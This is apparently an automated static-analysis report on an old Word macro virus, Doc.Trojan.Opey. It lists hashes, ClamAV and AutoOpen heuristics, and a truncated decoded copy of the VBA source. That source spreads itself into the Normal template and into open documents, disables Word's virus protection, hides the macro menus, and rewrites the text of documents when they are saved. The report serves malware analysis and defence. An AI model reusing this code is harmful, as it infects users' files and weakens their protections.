Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e5ab495cd8a76bf7…

MALICIOUS

Office (OLE)

36.0 KB Created: 2000-02-05 01:15:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d66651361bc22fb1a76fdb8d728ef469 SHA-1: 9f1710bac26d1e5251aceb9e22db21c33d0bc3f3 SHA-256: e5ab495cd8a76bf7ccae5c9341b94f978d3be1e84dd2ae8aa76c1ac43f75935f
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV with multiple critical detections, including 'Doc.Trojan.Opey-18'. The presence of legacy WordBasic and VBA macros, specifically an 'AutoOpen' macro, indicates an attempt to execute malicious code upon opening the document. The VBA script attempts to copy itself into the Normal template and any other open documents, suggesting a self-propagation or infection mechanism.

Heuristics 4

  • ClamAV: Doc.Trojan.Opey-18 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Opey-18
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6285 bytes
SHA-256: 15f08f71da8c82f8f2ea6183c4cbf8443327576b9d57c8f19cb34e091daeb065
Detection
ClamAV: Doc.Trojan.Opey-14
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Kinetic"
'Ang Bayrus na ito ay gawang pilipino
'Ipagmalaki natin! (guapito) p/n: D_NH691
'(c) 1999 by Kinetic Stab of Hackerz Networx
'(www.hnetworx.iscool.net) or (surf.to/hacknet.com)
'Virus Name: TangnalakiU

Sub Ikaw()
  On Error Resume Next
    Call Kinetic
    NTInfected = False
        For i = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
            clan = NormalTemplate.VBProject.VBComponents(i).Name
                If clan = "Kinetic" Then NTInfected = True
                If (clan <> "Kinetic") And (clan <> "ThisDocument") Then Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=clan, Object:=wdOrganizerObjectProjectItems
        Next i
        For Each opendoc In Documents
            ODInfected = False
            With opendoc
                For j = opendoc.VBProject.VBComponents.Count To 1 Step -1
                clan = opendoc.VBProject.VBComponents(j).Name
                    If clan = "Kinetic" Then ODInfected = True
                    If (clan <> "Kinetic") And (clan <> "ThisDocument") And (clan <> "Reference to Normal") Then Application.OrganizerDelete Source:=opendoc.FullName, Name:=clan, Object:=wdOrganizerObjectProjectItems
                Next j
                If ODInfected = False Then
                    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=opendoc.FullName, Name:="Kinetic", Object:=wdOrganizerObjectProjectItems
                    opendoc.SaveAs FileName:=opendoc.FullName
                End If
            End With
        Next opendoc
            If NTInfected = False Then
                Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Kinetic", Object:=wdOrganizerObjectProjectItems
                NormalTemplate.Save
            End If
End Sub
Sub Kinetic()
    On Error Resume Next
    Application.UserName = "Kinetic Stab"
    Application.UserAddress = "www.hnetworx.iscool.net"
    Application.UserInitials = "Kinetic"
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "Kinetic Stab"
        .Title = "This One is for MaIdCr"
        .Subject = "Is it okay if I call you mine?"
        .Company = "Hackerz Networx"
        .Comments = "Tangnalakiu"
        .Execute
    End With
    With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
    With ActiveDocument
        .ReadOnlyRecommended = False
    End With
    On Error Resume Next
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    CommandBars("Tools").Controls("Macro").Enabled = False
    CommandBars("Tools").Controls("Customize...").Delete
    CustomizationContext = NormalTemplate
End Sub
Sub FileSave()
    On Error Resume Next
        Selection.HomeKey Unit:=wdStory
        Selection.Find.ClearFormatting
        Selection.Find.Replacement.ClearFormatting
        With Selection.Find
            .Text = "The"
            .Replacement.Text = "Kinetic"
            .Forward = True
            .Wrap = wdFindContinue
            .Format = False
            .MatchCase = False
            .MatchWholeWord = True
            .MatchAllWordForms = False
        End With
        Selection.Find.Execute Replace:=wdReplaceAll
CommandBars("edit").Controls("Undo VBA-Find.Execute").Delete
CommandBars("edit").Controls("Repeat Replace...").Delete
CommandBars("edit").Controls("Replace...").Delete
If ActiveDocument.Saved = False Then ActiveDocument.Save

    Call Ikaw
    ActiveDocument.Save
End Sub
Sub FileClose()
    On Error Resume Next
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.